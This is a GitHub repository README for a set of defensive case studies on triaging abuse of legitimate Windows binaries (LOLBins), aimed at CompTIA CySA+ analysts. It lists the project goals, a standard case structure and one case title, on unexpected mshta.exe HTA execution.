Living Off the Land Binary (LOLBin) Triage Case Studies for Cybersecurity Analysis
This repository documents real-world forensic triage cases involving the abuse of legitimate Windows binaries—also known as LOLBins—for malicious purposes. Each case study follows a structured, professional-grade methodology aligned with incident response workflows and exam objectives from the CompTIA CySA+ certification.
- Provide technically rigorous, attacker-centric IOC case studies
- Train cybersecurity analysts to recognize LOLBin abuse patterns
- Demonstrate structured triage workflows using real telemetry sources
- Build a reusable reference system for host-based and network-based investigations
Each case follows a consistent structure:
- Technical Definition
- Source of IOC (Telemetry Origin)
- Triage Framework Declaration
- Standard Investigative Toolkit (Ordered and Layered)
- Host OS Layer Mapping
- Cross-Layer Interaction Pivots
- OSI Layer Relevance
- Attacker Behavior Interpretation
- Defender Action Summary
- Attacker Strategy Notes
- IOC #11 –
mshta.exeExecution (Unexpected HTA Launch)
Abuse of a trusted Windows binary to launch remote or inline scripts for initial access and persistence.
More case studies will be added regularly.
Steven Tuschman
GitHub: CompCode1
Engineered Cybersecurity Architecture | Triage Systems | IOC Pattern Recognition
This project is licensed under the MIT License.